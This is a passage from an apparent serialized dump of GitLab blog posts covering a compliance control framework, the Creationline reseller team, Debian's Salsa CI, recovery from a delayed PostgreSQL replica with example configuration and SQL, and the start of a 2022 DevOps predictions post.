will walk through how we implemented the [Adobe open source compliance framework (CCF)](https://blogs.adobe.com/security/2017/05/open-source-ccf.html) and adapted it to our needs, resulting in the GitLab Control Framework (GCF).\n\n## Implementation and adaptation\n\nWhen you download the Adobe CCF you get two PDF documents: a whitepaper on the state of compliance at Adobe and a table of all the generic CCF controls. The first thing we did was to convert the CCF controls PDF to a CSV so we could more easily make changes to the data. Most of these changes were to make the control statements specific to GitLab and our compliance needs.\n\nWe were careful when making changes to ensure that we weren't changing anything foundational about the statement, as this could break the mapping to underlying requirements. For example, [PCI DSS](https://www.pcisecuritystandards.org/documents/ASV_Program_Guide_v3.0.pdf) states that an organization must “run internal and external network vulnerability scans at least quarterly and after any significant change in the network (such as new system component installations, changes in network topology, firewall rule modifications, product upgrades).” If you were to make the frequency of the [Vulnerability Scans control](/handbook/security/security-assurance/security-compliance/guidance/vulnerability-and-patch-management.html#controls) “annual” instead of “quarterly,” that control would no longer map to PCI DSS control 11.2 since that underlying PCI control requires at least quarterly scanning.\n\n### Now we have a set of security controls specific to GitLab’s compliance needs\n\nWe found it helpful to create a prefix for each domain (e.g. AM for Asset Management, BC for Business Continuity, etc.) of controls and use these to create control numbers for each control (e.g. AM.1.01, BC.1.04, etc.). With this information in place, the real fun started.\n\nThere are 184 default controls. This number will expand or contract based on your individual needs. For example, if you have a need for FedRamp certification you might have different control requirements than an organization that doesn't. This is a lot of controls to try and roll out all at once, and most organizations don’t need to address all of the underlying control frameworks simultaneously. At GitLab, we knew that a SOC2 certification was the first compliance priority for us and, based on these needs, we started by prioritizing all controls that mapped to SOC2’s Common Criteria. This gave us a list of 63 controls – a much more manageable starting point.\n\nFor these 63 controls we wanted to build out additional content relating to each. In particular, we wanted a Markdown file that addressed each of the following topics for each control:\n\n* Control Statement\n* Context\n* Scope\n* Ownership\n* Implementation Guidance\n* Reference Links\n* Examples of evidence an auditor might request to satisfy this control\n* Framework Mapping\n\nMost of this information can be seen within the [security control pages in our handbook](/handbook/security/security-assurance/security-compliance/sec-controls.html); however, some of these topics contain sensitive information so we have a repo only accessible to GitLab team members.\n\n### The last steps in this implementation process were to:\n\n1. Identify the teams within GitLab that were responsible, accountable, consulted, and informed for each of our 63 prioritized controls, and then\n2. Perform a gap analysis for each of these controls to see what our starting point was for each, in terms of our state of compliance.\n\nThe above steps each build on the previous ones, and help to ensure enough baseline context and requirements were established and that we understood the context and scope for each control sufficiently to perform the gap analysis.\n\n## Adopting the GCF and future plans\n\nOur goal in sharing the details behind our compliance framework implementation is to lessen the adoption effort for smaller companies and GitLab customers alike. We’ve created a [public repo that has a copy of the csv file we adapted from the Adobe CCF](https://gitlab.com/gitlab-com/gl-security/public-gcf) and a link to a view-only [Google Sheet with all of these controls and variables in place](https://docs.google.com/spreadsheets/d/1xmACTt5WD_u8OL0z8G0oUv7Di9J4DWHuy2kamch_7-g/edit#gid=907478311) to make adaptation to your organization as easy as possible.\n\nWe’re currently working on scripts that turn SOC2 and HIPAA-related controls into individual issues within a GitLab project. We’re also working on a CSV-to-JSON tool that would easily convert the control CSV into a large data blob, making deployment for certain organizations easier.\n\n**We plan to make these tools available as they are ready but we also want to hear from you.** *What features would make the adoption of these controls easier? How are you using GitLab to help with your compliance needs? What else can GitLab contribute to the security compliance industry to help companies of all sizes align with security best practices and reduce the effort needed for external security validations/certifications?* **Leave us a comment below!**\n\nPhoto by [geraldo stanislas](https://unsplash.com/@pixelsucker?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on Unsplash\n{: .note}\n",[9,865],{"slug":1705,"featured":6,"template":689},"creating-the-gitlab-controls-framework","content:en-us:blog:creating-the-gitlab-controls-framework.yml","Creating The Gitlab Controls Framework","en-us/blog/creating-the-gitlab-controls-framework.yml","en-us/blog/creating-the-gitlab-controls-framework",{"_path":1711,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1712,"content":1717,"config":1722,"_id":1724,"_type":14,"title":1725,"_source":16,"_file":1726,"_stem":1727,"_extension":19},"/en-us/blog/creationline-post",{"title":1713,"description":1714,"ogTitle":1713,"ogDescription":1714,"noIndex":6,"ogImage":1192,"ogUrl":1715,"ogSiteName":673,"ogType":674,"canonicalUrls":1715,"schema":1716},"Meet Creationline team members who contribute to GitLab","Creationline contributes to GitLab as a reseller. Three team members explain how it works.","https://about.gitlab.com/blog/creationline-post","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Meet Creationline team members who contribute to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-11-27\",\n      }",{"title":1713,"description":1714,"authors":1718,"heroImage":1192,"date":1013,"body":1719,"category":10,"tags":1720},[704],"\nFor this edition of the [GitLab contributor blog posts](/blog/tags.html#contributors), I'm\nexcited to introduce Creationline, which is a [GitLab reseller in Japan](/resellers/creationline/). As you read this blog post, you will find Creationline is not a typical reseller. Their team were able to help both their customers and the GitLab community through their contributions. Here's what three Creationline employees had to share with us. \n\n## Decision to partner with Gitlab and contributing as a reseller\n#### [Jean-Baptiste Vasseur](https://gitlab.com/jvasseur), Agile Coach and DevOps Consultant \n\nWhen we explored the [DevOps](/topics/devops/) landscape about 3 years ago, we accidentally came across [GitLab’s handbook](/handbook/). This was a revelation for us! Pushing transparency to a point where job applicants know how GitLab members are expected to behave with candidates, a company culture where people are not afraid to communicate their failures, published company business targets and how the team is planning to achieve them, and of course how an open source software philosophy applied to every aspect of GitLab. We felt connected to so many aspects of GitLab’s company culture that I wanted to find a way to work together.\n\nAs [Creationline](http://www.creationline.com/gitlab) was already reselling licenses for other cloud and DevOps companies, and as GitLab was looking for more partners in different countries at that time, we felt confident we had a very good match and started distributing GitLab licenses in June, 2017.\n\nI usually invest a lot of my time prospecting clients, providing technical and value chain consulting, and contributing to the local community by co-organizing meetups and delivering CI/CD workshops. While I also love writing code – I come from an engineering background – it's a challenge to find the time to make open source contributions. However, while I was consulting for a large IT firm that was developing an internal DevOps package built around GitLab, I had an opportunity to make a valuable contribution to GitLab on the company's behalf. The team had a lot of passion for the project and loved working with the GitLab product, but they got blocked by a missing API and were not comfortable enough with their English to open a merge request.\n\nAs consultants, we did not have the responsibility of adding features or fixing issues on GitLab, but I really wanted to help our client. I explored the source code, figured out the pattern/coding style, and opened my first [merge request](https://gitlab.com/gitlab-org/gitlab-foss/merge_requests/22296). Review happened almost immediately, and GitLab team members were very nice and also challenged me to apply some refactoring, which helped me learn even more about the source code.\n\n![Open Source Summit Japan, 2019](https://about.gitlab.com/images/blogimages/creationline-blogpost/Creationline-OSS-Japan.jpg){: .shadow.medium.center}\nCreationline and GitLab team members at Open Source Summit-Japan\n{: .note.text-center}\n\n## Journey from an end user to a regular contributor to an evangelist\n#### [Hiroyuki Sato](https://gitlab.com/hiroponz), GitLab Evangelist\n\nI started to contribute to GitLab back in 2012. At that time I was already using GitLab at work, and I wanted to fix a bug that I was facing. This issue was preventing the source code diff from being displayed on the screen, but it was only occurring when using Japanese. As this issue was not seen in other languages, this was not a high priority bug, but it was impacting us severely. I found it very natural to fix it myself and to open a [merge request](https://github.com/gitlabhq/gitlabhq/pull/2100). In order to solve this, I also had to first fix the gem ‘grit_ext’ that GitLab was using, and created [another merge request](https://github.com/gitlabhq/grit_ext/pull/1).\n\nBoth merge requests got reviewed and merged within three days! This experience was so exciting that I started to contribute more and created [multiple merge requests](https://github.com/gitlabhq/gitlabhq/pulls?q=is%3Apr+author%3Ahiroponz+is%3Aclosed), and eventually I was awarded the [MVP](https://about.gitlab.com/community/mvp/) for GitLab's 5.1 release.\n\nLater on, as I really loved GitLab as a product, I started to explore if there was a way for me to work more closely with GitLab. This is when I met Creationline, which had just become the exclusive reseller in Japan and I decided to join them in April, 2018.\n\nNow, I am involved in pre-sales, marketing, customer support, and I also offer trainings on how to get the best out of GitLab. Of course, I still invest a part of my time to [contribute to GitLab](https://gitlab.com/groups/gitlab-org/-/merge_requests?%0Ascope=all&utf8=%E2%9C%93&state=merged&author_username=hiroponz) to help customers overcome issues/challenges, and this is one of my favorite parts of the job!\n\n## Dogfooding at Creationline\n#### [Yuko Takano](https://gitlab.com/takano_cl), Customer Success Manager\n\nAs a reseller team, we wanted to have more opportunities to use GitLab on a daily basis so we can support our customers better. We also wanted to experience the continuous server side operations, and set up our own instance so that we can capitalize on this experience.\n\nWe started using GitLab inside the GitLab reseller team, and then expanded it to various business functions within our organization. We now use a lot of GitLab features in order to manage source code, visualize our sales and marketing workflow, track translation work, organize OKRs with epics, and we continue to look for other areas to explore.\n\n![GitLab CI workshop](https://about.gitlab.com/images/blogimages/creationline-blogpost/Creationlin-GitLab-workshop.jpg){: .shadow.medium.center}\nCreationline team running the GitLab CI Workshop\n{: .note.text-center}\n\n## Interested in learning how you can contribute?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can\nlearn how you can contribute to GitLab's code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n",[267,9,708,1721],"releases",{"slug":1723,"featured":6,"template":689},"creationline-post","content:en-us:blog:creationline-post.yml","Creationline Post","en-us/blog/creationline-post.yml","en-us/blog/creationline-post",{"_path":1729,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1730,"content":1736,"config":1742,"_id":1744,"_type":14,"title":1745,"_source":16,"_file":1746,"_stem":1747,"_extension":19},"/en-us/blog/debian-customizes-ci-tooling-with-gitlab",{"title":1731,"description":1732,"ogTitle":1731,"ogDescription":1732,"noIndex":6,"ogImage":1733,"ogUrl":1734,"ogSiteName":673,"ogType":674,"canonicalUrls":1734,"schema":1735},"Debian customizes CI tooling with GitLab","Debian developer Santiago Ruano Rincón explains the Linux distribution's custom solution for improving and expediting the open source software packaging process.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663000/Blog/Hero%20Images/tanukilifecycle.png","https://about.gitlab.com/blog/debian-customizes-ci-tooling-with-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Debian customizes CI tooling with GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Santiago Ruano Rincón\"}],\n        \"datePublished\": \"2023-09-19\",\n      }",{"title":1731,"description":1732,"authors":1737,"heroImage":1733,"date":1739,"body":1740,"category":10,"tags":1741},[1738],"Santiago Ruano Rincón","2023-09-19","\nI still remember the day I broke a widely used critical tool for open source developers around the world.\nAs part of the [Debian Linux distribution project](https://www.debian.org/), I maintain [grep](https://tracker.debian.org/pkg/grep), the GNU/Linux application used to search for text patterns in files.\nI had just uploaded a new Debian release of grep to the Debian archive, when some hours later, a Debian friend called me to let me know other Debian developers were unable to boot their personal computers.\n\nThat was late in 2005 – ever since then I'd wished for a way to prevent that scenario from happening again.\n\nToday, that solution exists.\nIt's part of Salsa, Debian's GitLab implementation, which powers Debian development for more than 900 developers in the global Debian community.\nThanks to GitLab's robust CI/CD functionality, those developers are able to test their packages *before* releasing them to the public Debian archive — saving them from causing the kind of turmoil I accidentally caused.\n\n> [Join us at Open Source Summit Europe 2023](https://go.gitlab.com/dPQ92t) to learn more about GitLab's dedication to open source.\n\nIn this article, I'll explain how that tool, called [Salsa CI](https://salsa.debian.org/salsa-ci-team/pipeline/), helps Debian developers using GitLab streamline software development, accelerate package maintenance, and significantly reduce time-consuming re-work.\n\n## Debian with extra Salsa\nSalsa CI is one of the Debian community's custom-built continuous integration tools.\nIt's part of the Debian GitLab instance ([Salsa](https://wiki.debian.org/Salsa)), and helps Debian maintainers manage roughly [9,000 projects](https://codesearch.debian.net/search?q=pipeline-jobs+path%3Adebian%2F.*.yml&literal=0&perpkg=1).\n\n### How Salsa CI works\nAs a Linux distribution, Debian packages open source software from multiple upstream sources. \nWhen new upstream source code is released, maintainers can test that code to ensure it will build and run reliably for Debian users as part of the Debian release cycle.\n* Packages appear first in [Debian Unstable](https://wiki.debian.org/DebianUnstable).\n* If those packages don't introduce regressions or serious bugs, they can migrate to [Debian Testing](https://wiki.debian.org/DebianTesting).\n* When a new Debian release is published, those packages move to [Debian Stable](https://wiki.debian.org/DebianStable).\n\nSalsa CI helps increase the probability that packages can pass from Unstable to Testing reliably, quickly, and without issue.\nIn effect, it emulates the Debian build process, adding several quality checks to identify errors before they would affect Debian users. \nWhen new source code triggers a Salsa CI pipeline, 17 different jobs run to build and test it automatically.\nSalsa CI checks to see whether the to-be-uploaded packages build on multiple architectures (at the moment, amd64 and i386, and optionally on Arm), runs [autopkgtest test suites](https://wiki.debian.org/ContinuousIntegration/autopkgtest) to try to identify potential regressions, and checks for common errors with our custom linter, [lintian](https://wiki.debian.org/Lintian), among other tests.\nYou can view all the details at Debian's public GitLab instance (I maintain the `grep` package for Debian, so I'll offer that one as [an example of Salsa CI in action](https://salsa.debian.org/debian/grep/-/pipelines/576674)).\n\n![An overview of Salsa CI running on Debian's grep package](https://about.gitlab.com/images/blogimages/debian-grep-salsa-overview.png){: .shadow}\n\n## Life before Salsa CI\nMaintainers have been iterating on the Salsa CI pipeline for more than four years now. \nBut I have not forgotten what life as a package maintainer in the Debian community was like without it.\n\nMost of the work Salsa CI performs today is work that community members would otherwise need to perform manually. \nSo it proceeded slowly and was prone to more errors.\nWhile use of Salsa CI isn't compulsory for Debian maintainers, many choose to use it for their work because it saves them an incredible amount of time and effort — and because it leads to fewer breaking packages.\nMaintainers no longer need to run their own package tests locally; instead, Salsa performs this work remotely.\n\nAnd it works quickly.\nIdentifying issues with [Debian's primary CI system](https://ci.debian.net) when testing packages might require several hours, days, or even a month. \nSalsa CI reduces that time horizon to several *minutes* (or hours, in the worst cases), depending on the complexity of the package. For example:\n* Without Salsa CI, maintainers manually upload their packages and must wait for build results from the Debian build network (and they must do this for each architecture they wish to test). Usually, if a build fails, maintainers test on bespoke \"[porterboxes](https://wiki.debian.org/PorterBoxHowToUse)\" tailored to specific architectures. Using Salsa CI, however, maintainers can test x86 and Arm package builds easily — after a single `git push` command.\n\n* Running `autopkgtest` on [ci.debian.net](https://ci.debian.net/) (the official and central CI infrastructure for Debian) tests only the packages that have been built by the build servers and installed in the archive. `autopkgtest` is run for migration reference monthly. In Salsa CI, however, `autopkgtest` runs immediately after the amd64 build job has finished, decreasing review cycle times.\n\n## Salsa CI in the open source ecosystem\nOverall, the Debian community has been pleased with the progress Salsa CI maintainers have made since the tool's creation four years ago.\nOther open source communities are taking notice, too.\nFor instance, Salsa CI has become the basis for even more complex CI pipelines in projects like [Kali Linux](https://go.gitlab.com/G1XROS).\nWe're delighted to see that something we created to solve our own issues and improve our own work is making a positive impact on the open source ecosystem more broadly.\n\n*Editor's note: Debian developers [Alexander Wirt](https://gitlab.com/formorer) and [Otto Kekäläinen](https://gitlab.com/ottok) contributed to this article.*\n\n[Join us at Open Source Summit Europe 2023](https://go.gitlab.com/dPQ92t) to learn more about GitLab's dedication to open source.\n{: .note}\n",[9,267,1099],{"slug":1743,"featured":6,"template":689},"debian-customizes-ci-tooling-with-gitlab","content:en-us:blog:debian-customizes-ci-tooling-with-gitlab.yml","Debian Customizes Ci Tooling With Gitlab","en-us/blog/debian-customizes-ci-tooling-with-gitlab.yml","en-us/blog/debian-customizes-ci-tooling-with-gitlab",{"_path":1749,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1750,"content":1756,"config":1762,"_id":1764,"_type":14,"title":1765,"_source":16,"_file":1766,"_stem":1767,"_extension":19},"/en-us/blog/delayed-replication-for-disaster-recovery-with-postgresql",{"title":1751,"description":1752,"ogTitle":1751,"ogDescription":1752,"noIndex":6,"ogImage":1753,"ogUrl":1754,"ogSiteName":673,"ogType":674,"canonicalUrls":1754,"schema":1755},"How we used delayed replication for disaster recovery with PostgreSQL","Replication is no backup. Or is it? Let's take a look at delayed replication and how we used it to recover from accidental label deletion.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749683349/Blog/Hero%20Images/mathew-schwartz-397471-unsplash.jpg","https://about.gitlab.com/blog/delayed-replication-for-disaster-recovery-with-postgresql","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How we used delayed replication for disaster recovery with PostgreSQL\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Andreas Brandl\"}],\n        \"datePublished\": \"2019-02-13\",\n      }",{"title":1751,"description":1752,"authors":1757,"heroImage":1753,"date":1759,"body":1760,"category":801,"tags":1761},[1758],"Andreas Brandl","2019-02-13","\nThe [infrastructure team](/handbook/engineering/infrastructure/) at GitLab is responsible for the operation of [GitLab.com](https://gitlab.com/), the largest GitLab instance in existence: With about 3 million users and nearly 7 million projects, it is one of the largest single-tenancy, open source SaaS sites on the internet. The PostgreSQL database system is a critical part of the infrastructure that powers GitLab.com and we employ various strategies to provide resiliency against all kinds of data-loss-inducing disasters. Those are highly unlikely of course, but we are well prepared with backup and replication mechanisms to recover from these scenarios.\n\nIt's a misconception to think of replication as a means to back up a database ([see below](#summing-up)). However, in this post, we're going to explore the power of delayed replication to recover data after an accidental deletion: On [GitLab.com](https://gitlab.com), a user [deleted a label](https://gitlab.com/gitlab-com/gl-infra/production/issues/509) for the [`gitlab-ce`](https://gitlab.com/gitlab-org/gitlab-ce/) project, thereby also losing the label's association with merge requests and issues.\n\nWith a delayed replica in place, we were able to recover and restore that data in under 90 minutes. We'll look into that process and how delayed replication helped to achieve this.\n\n### Point-in-time recovery with PostgreSQL\n\nPostgreSQL comes with a built-in feature to recover the state of a database to a certain point in time. This is called *[Point-in-Time Recovery](https://www.postgresql.org/docs/current/continuous-archiving.html)* (PITR), which leverages the same mechanics that are used to keep a replica up to date: Starting from a consistent snapshot of the whole database cluster (a *basebackup*), we apply the sequence of changes to the database state until a certain point in time has been reached.\n\nIn order to use this feature for a cold backup, we regularly take a basebackup of the database and store this in the *archive* (at GitLab, we keep the archive in [Google Cloud Storage](https://cloud.google.com/storage/)). Additionally, we keep track of changes to the database state by archiving the [*write-ahead log*](https://www.postgresql.org/docs/current/wal-intro.html) (WAL). With that in place, we can perform PITR to recover from a disaster: Start with a snapshot that was taken before the disaster happened and apply changes from the WAL archive until right before the disastrous event.\n\n### What is delayed replication?\n\n*Delayed replication* is the idea of applying time-delayed changes from the WAL. That is, a transaction that is committed at physical time `X` is only going to be visible on a replica with delay `d` at time `X + d`.\n\nFor PostgreSQL, there are two ways of setting up a physical replica of the database: *Archive recovery* and *streaming replication*. [Archive recovery](https://www.postgresql.org/docs/11/archive-recovery-settings.html) essentially works like PITR but in a continuous way: We keep retrieving changes from the WAL archive and apply them to the replica state in a continuous fashion. On the other hand, [streaming replication](https://wiki.postgresql.org/wiki/Streaming_Replication) directly retrieves the WAL stream from an upstream database host. We prefer archive recovery for delayed replication because it is simpler to manage and delivers an adequate level of performance to keep up with the production cluster.\n\n### How to set up delayed archive recovery\n\nConfiguration of [recovery options](https://www.postgresql.org/docs/11/recovery-config.html) mostly go into `recovery.conf`. Here's an example:\n\n```\nstandby_mode = 'on'\nrestore_command = '/usr/bin/envdir /etc/wal-e.d/env /opt/wal-e/bin/wal-e wal-fetch -p 4 \"%f\" \"%p\"'\nrecovery_min_apply_delay = '8h'\nrecovery_target_timeline = 'latest'\n```\n\nWith these settings in place, we have configured a delayed replica with archive recovery. It uses [wal-e](https://github.com/wal-e/wal-e) to retrieve WAL segments (`restore_command`) from the archive and delays application of changes by eight hours (`recovery_min_apply_delay`). The replica is going to follow any timeline switches present in the archive, e.g. caused by a failover in the cluster (`recovery_target_timeline`).\n\nIt is possible to configure streaming replication with a delay using `recovery_min_apply_delay`. However, there are a few pitfalls regarding replication slots, hot standby feedback, and others that one needs to be aware of. In our case, we avoid them by replicating from the WAL archive instead of using streaming replication.\n\nIt is worth noting that `recovery_min_apply_delay` was only introduced in PostgreSQL 9.4. However, in previous versions, a delayed replica is typically implemented with a combination of [recovery management functions](https://www.postgresql.org/docs/9.3/functions-admin.html) (`pg_xlog_replay_pause(), pg_xlog_replay_resume()`) or by withholding WAL segments from the archive for the duration of the delay.\n\n### How does PostgreSQL implement it?\n\nIt is particularly interesting to see how PostgreSQL implements delayed recovery. So let's look at [`recoveryApplyDelay(XlogReaderState)`](https://gitlab.com/postgres/postgres/blob/c24dcd0cfd949bdf245814c4c2b3df828ee7db36/src/backend/access/transam/xlog.c#L6124) below. It is called from the [main redo apply loop](https://gitlab.com/postgres/postgres/blob/c24dcd0cfd949bdf245814c4c2b3df828ee7db36/src/backend/access/transam/xlog.c#L7196) for each record read from WAL.\n\n```c\nstatic bool\nrecoveryApplyDelay(XLogReaderState *record)\n{\n\tuint8\t\txact_info;\n\tTimestampTz xtime;\n\tlong\t\tsecs;\n\tint\t\t\tmicrosecs;\n\n\t/* nothing to do if no delay configured */\n\tif (recovery_min_apply_delay \u003C= 0)\n\t\treturn false;\n\n\t/* no delay is applied on a database not yet consistent */\n\tif (!reachedConsistency)\n\t\treturn false;\n\n\t/*\n\t * Is it a COMMIT record?\n\t *\n\t * We deliberately choose not to delay aborts since they have no effect on\n\t * MVCC. We already allow replay of records that don't have a timestamp,\n\t * so there is already opportunity for issues caused by early conflicts on\n\t * standbys.\n\t */\n\tif (XLogRecGetRmid(record) != RM_XACT_ID)\n\t\treturn false;\n\n\txact_info = XLogRecGetInfo(record) & XLOG_XACT_OPMASK;\n\n\tif (xact_info != XLOG_XACT_COMMIT &&\n\t\txact_info != XLOG_XACT_COMMIT_PREPARED)\n\t\treturn false;\n\n\tif (!getRecordTimestamp(record, &xtime))\n\t\treturn false;\n\n\trecoveryDelayUntilTime =\n\t\tTimestampTzPlusMilliseconds(xtime, recovery_min_apply_delay);\n\n\t/*\n\t * Exit without arming the latch if it's already past time to apply this\n\t * record\n\t */\n\tTimestampDifference(GetCurrentTimestamp(), recoveryDelayUntilTime,\n\t\t\t\t\t\t&secs, &microsecs);\n\tif (secs \u003C= 0 && microsecs \u003C= 0)\n\t\treturn false;\n\n\twhile (true)\n\t{\n        // Shortened:\n        // Use WaitLatch until we reached recoveryDelayUntilTime\n        // and then\n        break;\n\t}\n\treturn true;\n}\n```\n\nThe takeaway here is that the delay is based on the physical time that was recorded with the commit timestamp of the transaction (`xtime`). We can also see that the delay is only applied to commit records but not to other types of records: Any data changes are directly applied but the corresponding commit is delayed, so these changes only become visible after the configured delay.\n\n### How to use a delayed replica to recover data\n\nLet's say we have a production database cluster and a replica with eight hours of delay. How do we use this to recover data? Let's look at how this worked in the case of the [accidental label deletion](https://gitlab.com/gitlab-com/gl-infra/production/issues/509).\n\nAs soon as we were aware of the incident, we [paused archive recovery](https://www.postgresql.org/docs/9.3/functions-admin.html) on the delayed replica:\n\n```sql\nSELECT pg_xlog_replay_pause();\n```\n\nPausing the replica eliminated the risk of the replica replaying the `DELETE` query. This is useful if you need more time to investigate.\n\nThe recovery approach is to let the delayed replica catch up until right before the point the `DELETE` query occurred. In our case we knew roughly the physical time of the `DELETE` query. We removed `recovery_min_apply_delay` and added `recovery_target_time` to `recovery.conf`. This effectively lets the replica catch up as fast as possible (no delay) until a certain point in time:\n\n```\nrecovery_target_time = '2018-10-12 09:25:00+00'\n```\n\nWhen operating with physical timestamps, it's worth adding a little margin for error. Obviously, the bigger the margin, the bigger the data loss. On the other hand, if the replica recovers beyond the actual incident timestamp it also replays the `DELETE` query and we would have to start over (or worse: use a cold backup to perform PITR).\n\nAfter restarting the delayed Postgres instance, we saw a lot of WAL segments being replayed until the target transaction time was reached. In order to get a sense of the progress during this phase, we can use this query:\n\n```sql\nSELECT\n  -- current location in WAL\n  pg_last_xlog_replay_location(),\n  -- current transaction timestamp (state of the replica)\n  pg_last_xact_replay_timestamp(),\n  -- current physical time\n  now(),\n  -- the amount of time still to be applied until recovery_target_time has been reached\n  '2018-10-12 09:25:00+00'::timestamptz - pg_last_xact_replay_timestamp() as delay;\n```\n\nWe know recovery is complete when the replay timestamp does not change any more. We can consider setting a [`recovery_target_action`](https://www.postgresql.org/docs/11/recovery-target-settings.html) in order to shut down, promote or pause the instance once replay has completed (the default is to pause).\n\nThe database is now in the state preceding the disastrous query. We can start to export data or otherwise make use of the database. In our case, we exported information about the label that was deleted and its association with issues and merge requests and imported that data into our production database. In other cases with more severe data loss, it can be favorable to promote the replica and continue to use it as a primary. However this means that we lose any data that was entered into the database after the point in time we recovered to.\n\nA more precise alternative to using physical timestamps for targeted recovery is using transaction ids. It is good practice to log transaction ids for e.g. DDL statements (like `DROP TABLE`) using `log_statements = 'ddl'`. If we had a transaction id at hand, we could have used `recovery_target_xid` instead in order to replay to the transaction that preceded the `DELETE` query.\n\nFor the delayed replica, the way back to normal is simple: Revert changes to `recovery.conf` and restart Postgres. After a while, the replica is going to show a delay of eight hours again – ready for any future disasters.\n\n### Benefits for recovery\n\nThe major benefit from a delayed replica over using a cold backup is that it eliminates the step of restoring a full snapshot from the archive. This can easily take hours, depending on network and storage speeds. In our case, it takes roughly five hours to retrieve the full ~2TB basebackup from the archive. In addition to that, we would have to apply 24 hours' worth of WAL in order to recover to the desired state (in the worst case).\n\nWith a delayed replica in place, we get two benefits over a cold backup:\n\n1. No need to retrieve a full basebackup from the archive and\n2. we have a *fixed* window of eight hours' worth of WAL that needs to be replayed to catch up.\n\nIn addition to that, we continuously test our ability to perform PITR from the WAL archive and would quickly realize WAL archive corruption or other WAL-related problems by monitoring the lag of the delayed replica.\n\nIn our example case, completing recovery took 50 minutes and translated to a recovery rate of 110 GB worth of WAL per hour (the archive was still on [AWS S3](https://aws.amazon.com/s3/) at that time). The incident was mitigated and data recovered and restored 90 minutes after work was started.\n\n### Summing up: Where delayed replication can be useful (and where it's not)\n\nDelayed replication can be used as a first resort to recover from accidental data loss and lends itself perfectly to situations where the loss-inducing event is noticed within the configured delay.\n\nLet's be clear though: *Replication is not a backup mechanism*.\n\nBackup and replication are two mechanisms with distinct purposes: A *cold backup* is useful to recover from a disaster, for example an accidental `DELETE` or `DROP TABLE` event. In this case, we utilize a backup from cold storage to restore an earlier state of a table or the whole database. On the other hand, a `DROP TABLE` query replicates nearly instantly to all replicas in a running cluster – hence normal replication on its own is not useful to recover from this scenario. Instead, the purpose of *replication* is mostly to guard database availability against failures of individual database servers and to distribute load.\n\nEven with a delayed replica in place, there are situations where we really want a cold backup that is stored in a safe place: data center failures, silent corruption, or other events that aren't visible right away, are prime candidates to rely on cold backups. With replication only, we'd be out of luck.\n\nNote: For [GitLab.com](https://gitlab.com/), we currently only provide system-level resiliency against data loss and do not provide user-level data recovery in general.\n\nPhoto by [Mathew Schwartz](https://unsplash.com/photos/sb7RUrRMaC4?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[803,9],{"slug":1763,"featured":6,"template":689},"delayed-replication-for-disaster-recovery-with-postgresql","content:en-us:blog:delayed-replication-for-disaster-recovery-with-postgresql.yml","Delayed Replication For Disaster Recovery With Postgresql","en-us/blog/delayed-replication-for-disaster-recovery-with-postgresql.yml","en-us/blog/delayed-replication-for-disaster-recovery-with-postgresql",{"_path":1769,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1770,"content":1776,"config":1782,"_id":1784,"_type":14,"title":1785,"_source":16,"_file":1786,"_stem":1787,"_extension":19},"/en-us/blog/devops-predictions-gitlab-experts-weigh-in-on-ai-security-remote-work-and-more",{"title":1771,"description":1772,"ogTitle":1771,"ogDescription":1772,"noIndex":6,"ogImage":1773,"ogUrl":1774,"ogSiteName":673,"ogType":674,"canonicalUrls":1774,"schema":1775},"2022 DevOps predictions: AI, security, remote work & more","Want to see into the DevOps future? We’ve got insights to share, including the challenges for AI/ML and the impact of cloud-native on DevSecOps.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749683162/Blog/Hero%20Images/tomasz-frankowski-kbufvkbfioe-unsplash.jpg","https://about.gitlab.com/blog/devops-predictions-gitlab-experts-weigh-in-on-ai-security-remote-work-and-more","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"2022 DevOps predictions: GitLab experts weigh in on AI, security, remote   work, and more\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2021-12-06\",\n      }",{"title":1777,"description":1772,"authors":1778,"heroImage":1773,"date":1779,"body":1780,"category":682,"tags":1781},"2022 DevOps predictions: GitLab experts weigh in on AI, security, remote   work, and more",[970],"2021-12-06","2022 is set to be a big year for [DevOps](/topics/devops/), especially when it comes to integrating AI and machine learning, pushing security further left in the development cycle, and expanding opportunities for open source and remote work. We’ve gathered eight predictions from the top minds here at GitLab about the DevOps platform and the DevOps industry overall.\n\n## 1. AI/ML adoption will increase and will be instrumental in addressing supply chain issues and labor shortages.\n\n[Taylor McCaslin](https://gitlab.com/tmccaslin), Group Manager, Product - ModelOps & Anti-Abuse, says:\n\n“We’re going to see increased adoption of [AI/ML](/direction/modelops/ai_assisted/) across all industries. With the labor and supply chain shortages and dramatic shifts in climate-related events, companies globally are having to learn to do more with less in even more dynamic environments. AI/ML is well-suited to solve some of these complex problems in industries we may not have expected [adoption from] this early.\n\nWe have started seeing governments embrace AI/ML technologies. When you think about it, governments are by definition inefficient, but they hold a lot of data that’s ripe territory for AI/ML to make an impact. Take the Internal Revenue Service in the U.S., for example. ML applied to process paper tax returns or to look for anomalies could reduce costs and increase revenue from catching tax fraud and data entry mistakes. Also, with Covid-19 not looking like it will go away anytime soon, there are huge data problems that are well suited for AI/ML in tracking and proving vaccination status. The list for AI/ML is endless.\n\nAI/ML still is a specialty field. So businesses need to have clear use cases for hiring data science teams and setting them up for success to deploy models into production. We still see friction between traditional DevOps technologies and new data science platforms slowing time to value and increasing the cost of developing AI/ML 